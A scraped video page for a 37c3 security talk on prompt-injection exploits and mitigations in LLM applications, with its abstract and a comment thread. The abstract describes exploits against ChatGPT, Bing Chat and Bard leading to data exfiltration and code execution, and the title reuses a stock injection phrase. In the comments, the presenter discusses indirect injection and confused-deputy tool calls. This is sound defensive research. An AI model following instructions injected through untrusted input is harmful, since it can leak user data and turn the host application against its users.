Тёмный

Real-world exploits and mitigations in LLM applications (37c3) 

Embrace The Red
Подписаться 4,2 тыс.
Просмотров 21 тыс.
50% 1
ВидеоПоделитьсяСкачатьДобавить в

Video recording of my talk at the 37th Chaos Communication Congress in Hamburg titled "NEW IMPORTANT INSTRUCTIONS: Real-world exploits and mitigations in Large Language Model applications" about LLM app security and Prompt Injections specifically.
A big thank you to the CCC organizers and all the volunteers for putting together such a great event!
Source Video: media.ccc.de/v/37c3-12292-new...
Blog Post: embracethered.com/blog/posts/...
Abstract:
With the rapid growth of AI and Large Language Models (LLMs) users are facing an increased risk of scams, data exfiltration, loss of PII, and even remote code execution. This talk will demonstrate many real-world exploits the presenter discovered, including discussion of mitigations and fixes vendors put in place for the most prominent LLM applications, including ChatGPT, Bing Chat and Google Bard. The talk is about LLM security at large with a focus specifically on implications of Prompt Injections.

Наука

Опубликовано:

 

29 дек 2023

Поделиться:

Ссылка:

Скачать:

Готовим ссылку...

Добавить в:

Мой плейлист
Посмотреть позже
Комментарии : 23   
@chitchatvn5208
@chitchatvn5208 2 месяца назад
Thanks Johann.
@embracethered
@embracethered 2 месяца назад
You are welcome!
@notV3NOM
@notV3NOM 3 месяца назад
Thanks , great insights
@embracethered
@embracethered 3 месяца назад
Thanks for watching! Glad it was interesting.
@jlf_
@jlf_ 4 месяца назад
I really enjoyed your talk, Johann! Thank you!
@embracethered
@embracethered 4 месяца назад
Thanks for watching and glad you enjoyed it! 🙂
@ludovicjacomme1804
@ludovicjacomme1804 4 месяца назад
Excellent presentation, thanks a lot for sharing, extremely informative.
@embracethered
@embracethered 4 месяца назад
Thanks for watching! Glad to hear it's informative! 🙂
@347my455
@347my455 4 месяца назад
superb!
@embracethered
@embracethered 4 месяца назад
Thank you!🙏
@artemsemenov8136
@artemsemenov8136 4 месяца назад
Thank you, is awesome!
@embracethered
@embracethered 4 месяца назад
Glad you like it!
@artemsemenov8136
@artemsemenov8136 4 месяца назад
@@embracethered I'm a fan of yours, I've talked about your research at cybersecurity conferences in Russia. You're awesome.
@embracethered
@embracethered 4 месяца назад
Thank you! 🙏
@artemsemenov8136
@artemsemenov8136 4 месяца назад
@@embracethered what you think abot LLM security scanners, garak and vigil. Also, have you met P2SQlinjection in the real world ?
@Fitnessdealnews
@Fitnessdealnews 4 месяца назад
One of the best presentation I’ve seen
@embracethered
@embracethered 4 месяца назад
Thanks for watching! Really appreciate the feedback! 😀
@macklemo5968
@macklemo5968 4 месяца назад
🔥
@embracethered
@embracethered 4 месяца назад
Thanks! 🚀🚀🚀
@MohdAli-nz4yi
@MohdAli-nz4yi 4 месяца назад
I think a better conclusion is: never put in the context of an LLM information you need to keep private, because it will leak.
@embracethered
@embracethered 4 месяца назад
Thanks for watching and the note. I think that misses the point that the LLM can attack the hosting app/user, so developers/users can't trust the responses. this includes confused deputy issues (in the app), such as automatic tool invocation.
@MohdAli-nz4yi
@MohdAli-nz4yi 4 месяца назад
@@embracethered Agreed! So 2 big points: 1. Never put info in LLM context you don't want to leak. 2. Never put untrusted input into LLM context, it's like executing arbitrary code you have downloaded from the internet on your machine. LLM inputs must always be trusted, because the LLM will "execute" it in "trusted mode".
@embracethered
@embracethered 4 месяца назад
@@MohdAli-nz4yi (1) I agree we shouldn't put sensitive information, like passwords, credit card number, or sensitive PII into chatbots. For (2) The challenge is that everyone wants to have an LLM operate over untrusted data. And that's the problem that hopefully one day will have a deterministic and secure solution. For now the best advise is to not trust the output. e.g. Developers shouldn't blindly take the output and invoke other tools/plugins in agents or render output as HTML, and users shouldn't blindly trust the output because it can be a hallucination (or a backdoor), or attacker controlled via an indirect prompt injection. However, some use cases might be too risky to implement at all. And its best to threat model implementations accordingly to understand risks and implications.
Далее
ASCII Smuggling: Crafting Invisible Text and Decoding Hidden Secrets -New Threat for LLMs and beyond
7:50
ASCII Smuggling: Crafting Invisible Text and Decoding Hidden Secrets -New Threat for LLMs and beyond
Просмотров 793
37C3 - Writing secure software
46:39
37C3 - Writing secure software
Просмотров 40 тыс.
Норочка нагулялась и вернулась домой😁 тгк: завидные котики
00:53
Норочка нагулялась и вернулась домой😁 тгк: завидные котики
Просмотров 671 тыс.
Don’t Laugh Challenge | Tictok Funny Videos 2024 | Public Hot Spring | Ghost Brother Ghost Brother
00:41
Don’t Laugh Challenge | Tictok Funny Videos 2024 | Public Hot Spring | Ghost Brother Ghost Brother
Просмотров 7 млн
ЭДИСОН И ХЕРЕЙД НА ОДНОМ БЛОКЕ В МАЙНКРАФТ!
19:37
ЭДИСОН И ХЕРЕЙД НА ОДНОМ БЛОКЕ В МАЙНКРАФТ!
Просмотров 978 тыс.
КТО КРУЧЕ ТАНЦУЕТ ЛАНДЫШИ?! 🪻😎 #виола #dance #shortvideo
00:28
КТО КРУЧЕ ТАНЦУЕТ ЛАНДЫШИ?! 🪻😎 #виола #dance #shortvideo
Просмотров 340 тыс.
37C3 - Finding Vulnerabilities in Internet-Connected Devices
47:22
37C3 - Finding Vulnerabilities in Internet-Connected Devices
Просмотров 25 тыс.
37C3 - Operation Triangulation: What You Get When Attack iPhones of Researchers
58:06
37C3 - Operation Triangulation: What You Get When Attack iPhones of Researchers
Просмотров 65 тыс.
Intro to LLM Security - OWASP Top 10 for Large Language Models (LLMs)
57:43
Intro to LLM Security - OWASP Top 10 for Large Language Models (LLMs)
Просмотров 3,5 тыс.
37C3 - All cops are broadcasting
1:03:55
37C3 - All cops are broadcasting
Просмотров 152 тыс.
Why you need to think like a hacker | Ted Harrington | TEDxFrankfurt
15:38
Why you need to think like a hacker | Ted Harrington | TEDxFrankfurt
Просмотров 16 тыс.
The AI Cybersecurity future is here
26:42
The AI Cybersecurity future is here
Просмотров 146 тыс.
“What's wrong with LLMs and what we should be building instead” - Tom Dietterich - #VSCF2023
49:47
“What's wrong with LLMs and what we should be building instead” - Tom Dietterich - #VSCF2023
Просмотров 146 тыс.
Stanford CS25: V3 I Retrieval Augmented Language Models
1:19:27
Stanford CS25: V3 I Retrieval Augmented Language Models
Просмотров 131 тыс.
VulnerabilityGPT: Cybersecurity in the Age of LLM and AI
1:18:28
VulnerabilityGPT: Cybersecurity in the Age of LLM and AI
Просмотров 17 тыс.
37C3 - SMTP Smuggling - Spoofing E-Mails Worldwide
31:40
37C3 - SMTP Smuggling - Spoofing E-Mails Worldwide
Просмотров 39 тыс.
Самый сложный Хуйвей: P40 Pro 🍌 #huawei #p40pro #glassreplacement
0:59
Самый сложный Хуйвей: P40 Pro 🍌 #huawei #p40pro #glassreplacement
Просмотров 399 тыс.
Хорошее место🥹 #apple #iphone #smartphone #сервис #android #айфон#топ #macbook #ремонт #ремонтайфон
0:18
Хорошее место🥹 #apple #iphone #smartphone #сервис #android #айфон#топ #macbook #ремонт #ремонтайфон
Просмотров 12 тыс.
КУПИЛ КАРТУ RTX 4090 ? А ЗА РЕМОНТ ПРИДЕТСЯ ЗАПЛАТИТЬ КАК ЗА 1.5 4090 - ФЕЙЛ КОМПАНИИ ASUS
1:00
КУПИЛ КАРТУ RTX 4090 ? А ЗА РЕМОНТ ПРИДЕТСЯ ЗАПЛАТИТЬ КАК ЗА 1.5 4090 - ФЕЙЛ КОМПАНИИ ASUS
Просмотров 589 тыс.
Хотел бы такой набор? #rtx #сборкапк #nvidia #games #pc #сборка #компьютер
0:41
Хотел бы такой набор? #rtx #сборкапк #nvidia #games #pc #сборка #компьютер
Просмотров 166 тыс.
🤯 МОЁ РАБОЧЕЕ МЕСТО #рабочееместо #пк #компьютер
0:55
🤯 МОЁ РАБОЧЕЕ МЕСТО #рабочееместо #пк #компьютер
Просмотров 115 тыс.
Как Айфон затролил Самсунг в 2024 году.
0:56
Как Айфон затролил Самсунг в 2024 году.
Просмотров 73 тыс.
ПРОБЛЕМА МЕХАНИЧЕСКИХ КЛАВИАТУР!🤬
0:59
ПРОБЛЕМА МЕХАНИЧЕСКИХ КЛАВИАТУР!🤬
Просмотров 389 тыс.